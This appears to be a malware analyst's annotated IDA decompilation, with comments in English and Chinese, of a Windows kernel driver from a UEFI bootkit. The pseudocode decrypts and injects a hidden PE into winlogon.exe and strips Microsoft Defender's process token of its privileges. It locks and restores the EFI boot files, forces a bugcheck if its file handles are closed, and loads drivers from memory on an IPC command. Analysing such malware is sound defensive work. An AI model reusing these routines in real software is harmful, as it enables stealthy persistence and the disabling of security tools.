ProcessInformations = (SYSTEM_PROCESS_INFORMATION *)((__int64 (__fastcall *)(_QWORD, _QWORD))ExAllocatePool)(
0i64,
i + 0x1000);
if ( !ProcessInformations )
break;
v5 = ZwQuerySystemInformation(SystemProcessInformation, ProcessInformations, infoLength, &infoLength);
if ( v5 != (unsigned int)STATUS_INFO_LENGTH_MISMATCH )
{
if ( v5 >= 0 )
{
ProcessInformations1 = ProcessInformations;
while ( 1 )
{
NextEntryOffset = ProcessInformations1->NextEntryOffset;
if ( ProcessInformations1->ImageName.Buffer && (ProcessInformations1->ImageName.Length & 0xFFFEu) < 0x200 )
{
memset(v11, 0, sizeof(v11));
memcpy_140001038(v11, ProcessInformations1->ImageName.Buffer, ProcessInformations1->ImageName.Length);
v8 = ProcessInformations1->ImageName.Length & 0xFFFE;
if ( v8 >= 0x200 )
_report_rangecheckfailure(); // __fastfail(8u);
*(__int16 *)((char *)v11 + v8) = 0;
// winlogon.exe 0xA9CFE2CB
if ( (unsigned int)ws_hash_0x1003f_14000327C(v11) == a1 )// 0xA9CFE2CB
break;
}
ProcessInformations1 = (SYSTEM_PROCESS_INFORMATION *)((char *)ProcessInformations1 + NextEntryOffset);
if ( !(_DWORD)NextEntryOffset )
goto LABEL_14;
}
UniqueProcessId = ProcessInformations1->UniqueProcessId;
}
LABEL_14:
((void (__fastcall *)(SYSTEM_PROCESS_INFORMATION *))ExFreePool)(ProcessInformations);
return UniqueProcessId;
}
}
return UniqueProcessId;
}
get_files_to_protect
__int64 __fastcall get_files_to_protect(wchar_t *Destination)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v2 = 0;
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\
BootPath = getBootpPath_1400034A4();
v4 = BootPath;
if ( BootPath )
{
v5 = 0x104i64;
v6 = (char *)BootPath - (char *)Destination;
v7 = Destination;
do
{
if ( v5 == 0xFFFFFFFF80000106ui64 )
break;
v8 = *(wchar_t *)((char *)v7 + v6);
if ( !v8 )
break;
*v7++ = v8;
--v5;
}
while ( v5 );
v9 = v7 + 0xFFFFFFFF;
if ( v5 )
v9 = v7;
*v9 = 0; // \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\
// grubx64.efi
v10 = (const wchar_t *)deobfuscate_wstring((__int64)byte_1400049D0, 0xCu, 1);
wcsncpy(Destination, 0x104ui64, v10); // \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\grubx64.efi
v11 = 0x104i64;
v12 = Destination + 0x104;
do
{
if ( v11 == 0xFFFFFFFF80000106ui64 )
break;
v13 = *(wchar_t *)((char *)v12 + (char *)v4 - (char *)(Destination + 0x104));
if ( !v13 )
break;
*v12++ = v13;
--v11;
}
while ( v11 );
v14 = v12 + 0xFFFFFFFF;
if ( v11 )
v14 = v12;
*v14 = 0;
// bootmgfw.efi
v15 = (const wchar_t *)deobfuscate_wstring((__int64)byte_1400049F0, 0xDu, 1);
wcsncpy(Destination + 0x104, 0x104ui64, v15);// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\bootmgfw.efi
v16 = Destination + 0x208;
v17 = 0x104i64;
v18 = v16;
do
{
if ( v17 == 0xFFFFFFFF80000106ui64 )
break;
v19 = *(wchar_t *)((char *)v18 + (char *)v4 - (char *)v16);
if ( !v19 )
break;
*v18++ = v19;
--v17;
}
while ( v17 );
v20 = v18 + 0xFFFFFFFF;
if ( v17 )
v20 = v18;
*v20 = 0;
// winload.efi
v21 = (const wchar_t *)deobfuscate_wstring((__int64)byte_140004A10, 0xCu, 1);
wcsncpy(v16, 0x104ui64, v21); // \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\winload.efi
v2 = 1;
((void (__fastcall *)(wchar_t *))ExFreePool)(v4);
}
return v2;
}
protect_file_ProtectFromClose
__int64 __fastcall protect_file_ProtectFromClose(wchar_t *path, _QWORD *handle)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// struct _OBJECT_HANDLE_FLAG_INFORMATION
// {
// BOOLEAN Inherit;
// BOOLEAN ProtectFromClose;
// };
HandleFlags = (_OBJECT_HANDLE_FLAG_INFORMATION)0x100;// ProtectFromClose->1
hprocess = 0i64;
FileHandle = 0i64;
Target = 0i64;
ObjectAttributes_1.Length = 0x30;
v3 = 0;
v13 = 0i64;
memset(&ObjectAttributes_1.RootDirectory, 0, 0x28);
clientid = 0i64;
if ( path )
{
((void (__fastcall *)(char *, wchar_t *))RtlInitUnicodeString)(v8, path);
ObjectAttributes.Length = 0x30;
ObjectAttributes.ObjectName = (PUNICODE_STRING)v8;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 0x40;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( (int)((__int64 (__fastcall *)(__int64 *, _QWORD, OBJECT_ATTRIBUTES *, IO_STATUS_BLOCK *, _QWORD, MACRO_FILE_ANY, _DWORD, MACRO_FILE_ATTRIBUTE, MACRO_FILE_ATTRIBUTE, _QWORD, _DWORD))ZwCreateFile)(
&FileHandle,
FILE_READ_ACCESS,
&ObjectAttributes,
&IoStatusBlock,
0i64,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_OPEN,
FILE_NON_DIRECTORY_FILE,
0i64,
0) >= 0 )
{
clientid.UniqueProcess = PsGetCurrentProcessId();
if ( (int)((__int64 (__fastcall *)(__int64 *, __int64, OBJECT_ATTRIBUTES *, CLIENT_ID *))ZwOpenProcess)(
&hprocess,
0x40i64,
&ObjectAttributes_1,
&clientid) >= 0
&& (int)((__int64 (__fastcall *)(__int64, unsigned __int64, unsigned __int64, HANDLE *, _DWORD, _DWORD, MACRO_DUPLICATE))ZwDuplicateObject)(
hprocess,
0xFFFFFFFFFFFFFFFFui64,
0xFFFFFFFFFFFFFFFFui64,
&Target,
0,
0,
DUPLICATE_SAME_ACCESS) >= 0
&& (int)((__int64 (__fastcall *)(unsigned __int64, __int64, HANDLE, __int64 *, _DWORD, _DWORD, MACRO_DUPLICATE))ZwDuplicateObject)(
0xFFFFFFFFFFFFFFFFui64,
FileHandle,
Target,
&v13,
0,
0,
DUPLICATE_SAME_ACCESS) >= 0
&& (int)((__int64 (__fastcall *)(__int64, _OBJECT_HANDLE_FLAG_INFORMATION *, _QWORD))ObSetHandleAttributes)(
v13,
&HandleFlags,
0i64) >= 0 )
{
v3 = 1;
if ( handle )
*handle = v13;
}
}
if ( Target )
((void (*)(void))ZwClose)();
if ( hprocess )
((void (*)(void))ZwClose)();
if ( FileHandle )
((void (*)(void))ZwClose)();
}
return v3;
}
init_ksecddSys_api_140001804
__int64 init_ksecddSys_api_140001804()
{
unsigned int v0; // ebx
PVOID ksecdd; // rax
__int64 ksecdd_1; // rdi
v0 = 0;
// ksecdd.sys 0xE3679785
ksecdd = get_module_handle_by_hash(0xE3679785);
ksecdd_1 = (__int64)ksecdd;
if ( ksecdd )
{
BCryptOpenAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE *, LPCWSTR, LPCWSTR, ULONG))get_proc_address_by_hash((__int64)ksecdd, 0xC694168A, 0);
BCryptSetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
ksecdd_1,
0x2163244B,
0);
BCryptGenerateSymmetricKey = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_KEY_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(ksecdd_1, 0x5CD9DC29, 0);
BCryptDecrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(ksecdd_1, 0xC604BB01, 0);
BCryptDestroyKey = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE))get_proc_address_by_hash(ksecdd_1, 0xB241FED1, 0);
BCryptCloseAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, ULONG))get_proc_address_by_hash(
ksecdd_1,
0x1ACC1354,
0);
BCryptGetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(ksecdd_1, 0x5239823F, 0);
return 1;
}
return v0;
}
inject_into_winlogon
__int64 inject_into_winlogon()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
oatt.Length = 0x30;
hprocess = 0i64;
ThreadHandle = 0i64;
v5[0] = 0;
imagedata = 0i64;
Process = 0i64;
clientid = 0i64;
memset(&oatt.RootDirectory, 0, 0x14);
ClientId = 0i64;
memset(&ApcState, 0, sizeof(ApcState));
*(_OWORD *)&oatt.SecurityDescriptor = 0i64;
// // winlogon.exe 0xA9CFE2CB
winlogon_pid = get_process_id_by_hash(0xA9CFE2CB);
winlogon_pid1 = winlogon_pid;
if ( winlogon_pid )
{
clientid.UniqueProcess = winlogon_pid;
if ( (int)((__int64 (__fastcall *)(HANDLE *, __int64, OBJECT_ATTRIBUTES *, CLIENT_ID *))ZwOpenProcess)(
&hprocess,
0x1FFFFFi64,
&oatt,
&clientid) >= 0 )
{
// Xlh2aR4zWn55A8e4qGViwBAVBKgaltpw
v3 = deobfuscate_bytes((BYTE *)&a1, 0x21u, 1);
imagedata = aes_cbc_decrypt((__int64)&byte_140006000, (__int64)v3, 0xB810u, v5);
if ( imagedata )
{
if ( v5[0]
&& (int)((__int64 (__fastcall *)(HANDLE, PEPROCESS *))PsLookupProcessByProcessId)(winlogon_pid1, &Process) >= 0 )
{
((void (__fastcall *)(PEPROCESS, KAPC_STATE *))KeStackAttachProcess)(Process, &ApcState);
memLoad_140002290((__int64)hprocess, imagedata, &EntryPoint);
((void (__fastcall *)(KAPC_STATE *))KeUnstackDetachProcess)(&ApcState);
if ( RtlCreateUserThread )
RtlCreateUserThread(hprocess, 0i64, 0i64, 0i64, 0i64, 0i64, EntryPoint, 0i64, &ThreadHandle, &ClientId);
else
((void (__fastcall *)(__int64 *, __int64, _QWORD, HANDLE))ZwCreateDebugObject)(
&ThreadHandle,
THREAD_ALL_ACCESS,
0i64,
hprocess);
}
}
}
}
if ( Process )
ObfDereferenceObject(Process);
if ( hprocess )
ZwClose(hprocess);
if ( imagedata )
((void (__fastcall *)(__int64))ExFreePool)(imagedata);
return ThreadHandle;
}
__int64 __fastcall memLoad_140002290(__int64 hprocess, __int64 imagedata, _QWORD *EntryPoint)
{
_IMAGE_NT_HEADERS64 *ntheader; // rdi
unsigned int v6; // ebx
void *baseaddr; // [rsp+68h] [rbp+10h] BYREF
__int64 SizeOfImage; // [rsp+78h] [rbp+20h] BYREF
ntheader = (_IMAGE_NT_HEADERS64 *)(imagedata + *(int *)(imagedata + 0x3C));
v6 = 0;
SizeOfImage = ntheader->OptionalHeader.SizeOfImage;
baseaddr = 0i64;
if ( (int)((__int64 (__fastcall *)(__int64, void **, _QWORD, __int64 *, int, int))ZwAllocateVirtualMemory)(
hprocess,
&baseaddr,
0i64,
&SizeOfImage,
0x3000,
0x40) >= 0 )
{
memset(baseaddr, 0, ntheader->OptionalHeader.SizeOfHeaders);
copySections_14000205C(ntheader, imagedata, (__int64)baseaddr);
if ( (unsigned int)setReplocation_1400020DC(ntheader, (__int64)baseaddr) )
{
v6 = 1;
*EntryPoint = (char *)baseaddr + ntheader->OptionalHeader.AddressOfEntryPoint;
}
}
return v6;
}
protect_file_handles_BSOD
so as long as you do what's in your heart... I believe you can do the right thing
void __fastcall protect_file_handles_BSOD(HANDLE *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// so as long as you do what's in your heart... I believe you can do the right thing
deobfuscate_wstring((__int64)byte_1400048F0, 0x52u, 1);
v2 = 3i64;
do
{
if ( *a1 )
{
if ( (unsigned int)((__int64 (__fastcall *)(HANDLE, _QWORD, _QWORD, _QWORD, char *))ZwQueryObject)(
*a1,
0i64,
0i64,
0i64,
&v3) == (unsigned int)STATUS_INVALID_HANDLE )
((void (__fastcall *)(__int64))KeBugCheck)(0x93i64);// INVALID_KERNEL_HANDLE
}
++a1;
--v2;
}
while ( v2 );
}
inject_into_winlogon_if_thread_not
void __fastcall inject_into_winlogon_if_thread_not(__int64 *remoteThreadHandle)
{
__int64 handle; // rcx
_THREAD_BASIC_INFORMATION v3; // [rsp+30h] [rbp-38h] BYREF
handle = *remoteThreadHandle;
memset(&v3, 0, sizeof(v3));
if ( handle
&& (int)((__int64 (__fastcall *)(__int64, _QWORD, _THREAD_BASIC_INFORMATION *, __int64, _QWORD))NtQueryInformationThread)(
handle,
ThreadBasicInformation,
&v3,
0x30i64,
0i64) >= 0
&& v3.ExitStatus != STATUS_PENDING )
{
((void (__fastcall *)(__int64))ZwClose)(*remoteThreadHandle);
*remoteThreadHandle = inject_into_winlogon();
}
}
remove_defender_Privileges
TOKEN_PRIVILEGES *remove_defender_Privileges()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
*(_QWORD *)&Level.Label.Attributes = 0x20i64;
tmp = (TOKEN_PRIVILEGES *)&v10;
hprocess = 0i64;
TokenHandle = 0i64;
clientid = 0i64;
ReturnLength = 0;
*(_DWORD *)&v10.Revision = 0x101;
*(_QWORD *)&v10.IdentifierAuthority.Value[2] = 0x10000000i64;
Level.Label.Sid = &v10;
oatt.Length = 0x30;
memset(&oatt.RootDirectory, 0, 0x14);
*(_OWORD *)&oatt.SecurityDescriptor = 0i64;
if ( !gMsMpEng_pid_140011820 )
{
// MsMpEng.exe 0x7F970559
tmp = (TOKEN_PRIVILEGES *)get_process_id_by_hash(0x7F970559);
gMsMpEng_pid_140011820 = (__int64)tmp;
if ( tmp )
{
clientid.UniqueProcess = tmp;
tmp = (TOKEN_PRIVILEGES *)((__int64 (__fastcall *)(__int64 *, _QWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *))ZwOpenProcess)(
&hprocess,
PROCESS_ALL_ACCESS,
&oatt,
&clientid);
if ( (int)tmp >= 0 )
{
tmp = (TOKEN_PRIVILEGES *)((__int64 (__fastcall *)(__int64, _QWORD, __int64 *))ZwOpenProcessToken)(
hprocess,
PROCESS_ALL_ACCESS,
&TokenHandle);
if ( (int)tmp >= 0 )
{
tmp = (TOKEN_PRIVILEGES *)((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, _QWORD, unsigned int *))ZwQueryInformationToken)(
TokenHandle,
TokenPrivileges,
0i64,
0i64,
&ReturnLength);
if ( (_DWORD)tmp == (unsigned int)STATUS_BUFFER_TOO_SMALL )
{
ReturnLength += 0x1000;
tmp = (TOKEN_PRIVILEGES *)((__int64 (__fastcall *)(_QWORD, _QWORD))ExAllocatePool)(0i64, ReturnLength);
NewState = tmp;
if ( tmp )
{
if ( (int)((__int64 (__fastcall *)(__int64, _QWORD, TOKEN_PRIVILEGES *, _QWORD, unsigned int *))ZwQueryInformationToken)(
TokenHandle,
TokenPrivileges,
tmp,
ReturnLength,
&ReturnLength) >= 0 )
{
for ( i = 0; i < NewState->PrivilegeCount; NewState->Privileges[v3].Attributes = SE_PRIVILEGE_REMOVED )
v3 = i++;
((void (__fastcall *)(__int64, _QWORD, TOKEN_PRIVILEGES *, _QWORD, _QWORD, _QWORD))ZwAdjustPrivilegesToken)(
TokenHandle,
0i64,
NewState,
ReturnLength,
0i64,
0i64);
((void (__fastcall *)(__int64, _QWORD, TOKEN_MANDATORY_LABEL *))ZwSetInformationToken)(
TokenHandle,
TokenIntegrityLevel,
&Level);
}
tmp = (TOKEN_PRIVILEGES *)((__int64 (__fastcall *)(TOKEN_PRIVILEGES *))ExFreePool)(NewState);
}
}
}
}
}
if ( TokenHandle )
tmp = (TOKEN_PRIVILEGES *)((__int64 (*)(void))ZwClose)();
if ( hprocess )
return (TOKEN_PRIVILEGES *)((__int64 (*)(void))ZwClose)();
}
return tmp;
}
do_ipc
__int64 __fastcall do_ipc(wchar_t *fpaths, PHANDLE handles)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ret = 0;
hevent = 0i64;
hsection = 0i64;
BaseAddress = 0i64;
ViewSize = 0i64;
memset(out_hex, 0, 0x64ui64);
// \BaseNamedObjects\xxxxxx
if ( (unsigned int)genBase_NamedObjects_machex_140003F94(out_hex) )
{
v5 = out_hex[0x12];
out_hex[0x12] = 0x5A; // 'Z', \BaseNamedObjects\ 后一位替换为'Z'-->eventname
((void (__fastcall *)(char *, wchar_t *))RtlInitUnicodeString)(eventname, out_hex);
v13.RootDirectory = 0i64;
v13.ObjectName = (PUNICODE_STRING)eventname;
v13.Length = 0x30;
v13.Attributes = 0x200;
*(_OWORD *)&v13.SecurityDescriptor = 0i64;
if ( (int)((__int64 (__fastcall *)(HANDLE *, _QWORD, OBJECT_ATTRIBUTES *))ZwOpenEvent)(// \BaseNamedObjects\Zxxxxx
&hevent,
EVENT_ALL_ACCESS,
&v13) >= 0 )
{
out_hex[0x12] = v5; // 恢复mac_hex,即恢复\BaseNamedObjects\ 后一位
if ( (int)((__int64 (__fastcall *)(HANDLE *, _QWORD, OBJECT_ATTRIBUTES *))ZwOpenSection)(// \BaseNamedObjects\xxxxxx
&hsection,
SECTION_ALL_ACCESS,
&v13) >= 0
&& (int)((__int64 (__fastcall *)(HANDLE, unsigned __int64, char **, _QWORD, _QWORD, _QWORD, __int64 *, _SECTION_INHERIT, _DWORD, _DWORD))ZwMapViewOfSection)(
hsection,
0xFFFFFFFFFFFFFFFFui64, // ZwCurrentProcess
&BaseAddress,
0i64,
0i64,
0i64,
&ViewSize,
ViewUnmap,
0,
PAGE_READWRITE) >= 0 )
{
ptr = BaseAddress;
if ( !BaseAddress )
goto LABEL_15;
// 通过event和setion进行通信
v7 = *BaseAddress;
if ( *BaseAddress == 'I' )
{
InstallSys_140002190((__int64)(BaseAddress + 8));// 内存加载驱动
}
else if ( v7 != 'P' )
{
if ( v7 != 'U' )
goto LABEL_13;
UnlockAndDel_1400042B0(fpaths, handles);
ret = 1;
}
((void (__fastcall *)(HANDLE, _QWORD))ZwSetEvent)(hevent, 0i64);
}
}
}
ptr = BaseAddress;
LABEL_13:
if ( ptr )
((void (__fastcall *)(unsigned __int64, void *))ZwUnmapViewOfSection)(0xFFFFFFFFFFFFFFFFui64, ptr);
LABEL_15:
if ( hsection )
ZwClose(hsection);
if ( hevent )
ZwClose(hevent);
return ret;
}
__int64 __fastcall genBase_NamedObjects_machex_140003F94(wchar_t *Destination)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v14 = 0i64;
v15 = 0;
*(_OWORD *)Count = 0i64;
v2 = 0;
if ( (unsigned int)GetPhyMacAddress_140003730((__int64)mac) )
{
for ( i = 0i64; i < 6; ++i )
{
v4 = mac[i];
if ( (unsigned __int8)v4 < 0x10u ) // mac[i]<0x10 时 +=0x10
mac[i] = v4 + 0x10;
}
// mac 转hex字符串
((void (__fastcall *)(_QWORD, wchar_t *, __int64))itow)((unsigned __int8)mac[0], Count, 0x10i64);
((void (__fastcall *)(_QWORD, wchar_t *, __int64))itow)((unsigned __int8)mac[1], &Count[2], 0x10i64);
((void (__fastcall *)(_QWORD, wchar_t *, __int64))itow)((unsigned __int8)mac[2], &Count[4], 0x10i64);
Count[6] = 0; // 只使用mac前3字节
// \BaseNamedObjects\
v5 = deobfuscate_wstring((__int64)&byte_1400049A0, 0x13u, 1);
v6 = Destination;
v7 = 0x32i64;
v8 = v5 - (char *)Destination;
do
{
if ( v7 == 0xFFFFFFFF80000034ui64 )
break;
v9 = *(wchar_t *)((char *)v6 + v8);
if ( !v9 )
break;
*v6++ = v9;
--v7;
}
while ( v7 );
v10 = v6 + 0xFFFFFFFF;
if ( v7 )
v10 = v6;
*v10 = 0;
wcsncpy(Destination, 0x32ui64, Count);
return 1;
}
return v2;
}
InstallSys_140002190
__int64 __fastcall loadSys_140002190(__int64 imagebase)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// \Registry\Machine\SYSTEM\CurrentControlSet\Services\disk
v2 = deobfuscate_wstring((__int64)&byte_140004840, 0x39u, 1);
((void (__fastcall *)(UNICODE_STRING *, char *))RtlInitUnicodeString)(&RegistryPath, v2);
base = 0x5A4Di64;
if ( *(_WORD *)imagebase == 0x5A4D )
{
ntheader = (_IMAGE_NT_HEADERS64 *)(imagebase + *(int *)(imagebase + 0x3C));
if ( ntheader->Signature == 0x4550 )
{
base = 0x8664i64;
if ( ntheader->FileHeader.Machine == 0x8664 )
{
base = ((__int64 (__fastcall *)(_QWORD, _QWORD))ExAllocatePool)(0i64, ntheader->OptionalHeader.SizeOfImage);
baseaddr = base;
if ( base )
{
memcpy_140001038((void *)base, (const void *)imagebase, ntheader->OptionalHeader.SizeOfHeaders);
copySections_14000205C(ntheader, imagebase, baseaddr);
if ( (unsigned int)setImport_140002334(ntheader, baseaddr)
&& (unsigned int)setReplocation_1400020DC(ntheader, baseaddr) )
{
base = ntheader->OptionalHeader.AddressOfEntryPoint;
if ( (_DWORD)base )
return ((__int64 (__fastcall *)(PDRIVER_OBJECT, UNICODE_STRING *))(baseaddr + base))(
gDriverObject_140012418,
&RegistryPath);
}
else
{
return ((__int64 (__fastcall *)(__int64))ExFreePool)(baseaddr);
}
}
}
}
}
return base;
}
UnlockAndDel_1400042B0
__int64 __fastcall UnlockAndDel_1400042B0(wchar_t *fpaths, PHANDLE handles)
{
unsigned int v2; // ebx
unsigned int i; // esi
_OBJECT_HANDLE_FLAG_INFORMATION objectHandleFlagInfo; // [rsp+40h] [rbp+18h] BYREF
v2 = 0;
objectHandleFlagInfo = 0;
for ( i = 0; i < 3; ++i )
{
if ( *handles )
{
// 解锁文件
if ( (int)((__int64 (__fastcall *)(HANDLE, _OBJECT_HANDLE_FLAG_INFORMATION *, _QWORD))ObSetHandleAttributes)(
*handles,
&objectHandleFlagInfo,
0i64) < 0
|| (int)((__int64 (__fastcall *)(HANDLE))ZwClose)(*handles) < 0 )
{
return v2;
}
*handles = 0i64;
}
++handles;
}
// 恢复启动器
return (unsigned int)DelAndRename_140003384((__int16 (*)[260])fpaths);
}
__int64 __fastcall DelAndRename_140003384(wchar_t *fpaths)
{
unsigned int v1; // ebx
int v3; // edi
char v5[16]; // [rsp+20h] [rbp-48h] BYREF
OBJECT_ATTRIBUTES v6; // [rsp+30h] [rbp-38h] BYREF
v1 = 0;
v3 = 0;
while ( 1 )
{
((void (__fastcall *)(char *, wchar_t *))RtlInitUnicodeString)(v5, &fpaths[0x104 * v3]);
v6.Length = 0x30;
v6.ObjectName = (PUNICODE_STRING)v5;
v6.RootDirectory = 0i64;
v6.Attributes = 0x40;
*(_OWORD *)&v6.SecurityDescriptor = 0i64;
// 删除
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\grubx64.efi (bootkit)
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\bootmgfw.efi (shim)
if ( (int)((__int64 (__fastcall *)(OBJECT_ATTRIBUTES *))ZwDeleteFile)(&v6) < 0 )
break;
if ( (unsigned int)++v3 >= 2 )
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\winload.efi (原始esp \EFI\Microsoft\Boot\bootmgfw.efi)
// 重命名为:
// \Device\HarddiskVolume[n]\EFI\Microsoft\Boot\bootmgfw.efi
return (unsigned int)rename_1400040D0(fpaths + 0x208, fpaths + 0x104);
}
return v1;
}
__int64 __fastcall rename_1400040D0(wchar_t *a1, wchar_t *a2)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v3 = 0;
fhandle = 0i64;
((void (__fastcall *)(UNICODE_STRING *, wchar_t *))RtlInitUnicodeString)(&v7, a1);
v9.RootDirectory = 0i64;
v9.ObjectName = &v7;
v9.Length = 0x30;
v9.Attributes = 0x40;
*(_OWORD *)&v9.SecurityDescriptor = 0i64;
finfo = (FILE_RENAME_INFORMATION *)((__int64 (__fastcall *)(_QWORD, __int64))ExAllocatePool)(0i64, 0x220i64);
if ( finfo )
{
if ( (int)((__int64 (__fastcall *)(__int64 *, __int64, OBJECT_ATTRIBUTES *, IO_STATUS_BLOCK *, _QWORD, int, int, int, int, _QWORD, _DWORD))ZwCreateFile)(
&fhandle,
0x10000000i64,
&v9,
&IoStatusBlock,
0i64,
0x80,
5,
1,
0x40,
0i64,
0) >= 0 )
{
memset(finfo, 0, 0x220ui64);
finfo->RootDirectory = 0i64;
finfo->Flags = 0;
finfo->FileNameLength = 2 * wcslen_14000329C(a2);
v5 = wcslen_14000329C(a2);
memcpy_140001038(finfo->FileName, a2, 2i64 * v5);
if ( (int)((__int64 (__fastcall *)(__int64, IO_STATUS_BLOCK *, FILE_RENAME_INFORMATION *, __int64, _FILE_INFORMATION_CLASS))ZwSetInformationFile)(
fhandle,
&IoStatusBlock,
finfo,
0x220i64,
FileRenameInformation) >= 0 )
v3 = 1;
}
}
if ( fhandle )
((void (*)(void))ZwClose)();
if ( finfo )
((void (__fastcall *)(FILE_RENAME_INFORMATION *))ExFreePool)(finfo);
return v3;